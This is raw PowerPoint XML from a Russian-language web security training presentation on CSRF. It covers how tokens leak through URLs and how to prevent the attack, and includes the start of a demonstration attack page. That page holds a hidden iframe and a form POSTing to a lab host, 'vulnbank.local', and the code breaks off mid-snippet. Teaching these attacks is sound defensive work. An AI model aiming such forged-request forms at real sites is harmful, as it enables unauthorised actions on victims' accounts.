                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>тела</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="50" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>запроса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, ч</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обы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5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избежать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="3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его использова</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-7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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="359410" marR="36195" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Токен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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можно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="1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включать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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4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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="35" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="1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но</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="3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это</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ув</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>чив</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ет</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р</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5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к,</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ч</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о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="3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та</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="15" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="2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будет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="2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получен злоумышленником,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-10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5"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т</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>н</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-3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может</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-35" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>быт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-30"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и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>п</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ьзован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-65" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>в ат</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ке.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>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F0F2D7C-0DE2-4759-81B8-35FB58780B09}"/>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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Как предотвратить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="446262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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA6B0E8-69EB-4DB7-B217-7B1278D030BE}"/>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Основные атаки и паттерны: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>Client-Side: XXS, CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46A63CC9-54DC-44D9-8387-95181D8AD958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442913" y="2028616"/>
            <a:ext cx="11306175" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>style=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E165A6"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E165A6"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>none</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>-frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>name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csrf_form</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action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>http: //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>vulnbank.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>vulnbank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>online</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>api.php?none</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method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"POST"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
